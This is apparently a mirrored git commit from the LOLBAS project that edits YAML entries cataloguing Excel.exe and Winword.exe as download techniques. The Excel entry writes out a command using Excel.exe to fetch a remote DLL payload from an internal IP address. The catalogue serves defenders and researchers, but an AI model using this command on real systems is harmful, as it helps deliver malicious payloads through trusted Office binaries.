mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-01-13 23:39:23 +01:00
Added Office binaries from jreegun to the project. Pull request 42
This commit is contained in:
parent
0644ac30d7
commit
32757cd0c3
@ -1,10 +1,10 @@
|
|||||||
---
|
---
|
||||||
Name: Excel.exe
|
Name: Excel.exe
|
||||||
Description: Microsoft Office binary.
|
Description: Microsoft Office binary
|
||||||
Author: 'Reegun J (OCBC Bank)'
|
Author: 'Reegun J (OCBC Bank)'
|
||||||
Created: '2019-07-19'
|
Created: '2019-07-19'
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Excel.exe "http://192.168.1.10/TeamsAddinLoader.dll"
|
- Command: Excel.exe http://192.168.1.10/TeamsAddinLoader.dll
|
||||||
Description: Downloads payload from remote server
|
Description: Downloads payload from remote server
|
||||||
Usecase: It will download a remote payload and place it in the cache folder
|
Usecase: It will download a remote payload and place it in the cache folder
|
||||||
Category: Download
|
Category: Download
|
||||||
@ -28,10 +28,14 @@ Full_Path:
|
|||||||
- Path: C:\Program Files (x86)\Microsoft Office\Office12\Excel.exe
|
- Path: C:\Program Files (x86)\Microsoft Office\Office12\Excel.exe
|
||||||
- Path: C:\Program Files\Microsoft Office\Office12\Excel.exe
|
- Path: C:\Program Files\Microsoft Office\Office12\Excel.exe
|
||||||
- Path: C:\Program Files\Microsoft Office\Office12\Excel.exe
|
- Path: C:\Program Files\Microsoft Office\Office12\Excel.exe
|
||||||
|
Code_Sample:
|
||||||
|
- Code:
|
||||||
|
Detection:
|
||||||
|
- IOC:
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/reegun21/status/1150032506504151040
|
- Link: https://twitter.com/reegun21/status/1150032506504151040
|
||||||
- Link: https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191
|
- Link: https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Reegun J (OCBC Bank)
|
- Person: 'Reegun J (OCBC Bank)'
|
||||||
Handle: '@reegun21'
|
Handle: '@reegun21'
|
||||||
---
|
---
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
Name: Winword.exe
|
Name: Winword.exe
|
||||||
Description: Microsoft Office binary.
|
Description: Microsoft Office binary
|
||||||
Author: 'Reegun J (OCBC Bank)'
|
Author: 'Reegun J (OCBC Bank)'
|
||||||
Created: '2019-07-19'
|
Created: '2019-07-19'
|
||||||
Commands:
|
Commands:
|
||||||
@ -28,10 +28,14 @@ Full_Path:
|
|||||||
- Path: C:\Program Files (x86)\Microsoft Office\Office12\winword.exe
|
- Path: C:\Program Files (x86)\Microsoft Office\Office12\winword.exe
|
||||||
- Path: C:\Program Files\Microsoft Office\Office12\winword.exe
|
- Path: C:\Program Files\Microsoft Office\Office12\winword.exe
|
||||||
- Path: C:\Program Files\Microsoft Office\Office12\winword.exe
|
- Path: C:\Program Files\Microsoft Office\Office12\winword.exe
|
||||||
|
Code_Sample:
|
||||||
|
- Code:
|
||||||
|
Detection:
|
||||||
|
- IOC:
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/reegun21/status/1150032506504151040
|
- Link: https://twitter.com/reegun21/status/1150032506504151040
|
||||||
- Link: https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191
|
- Link: https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Reegun J (OCBC Bank)
|
- Person: 'Reegun J (OCBC Bank)'
|
||||||
Handle: '@reegun21'
|
Handle: '@reegun21'
|
||||||
---
|
---
|
Loading…
Reference in New Issue
Block a user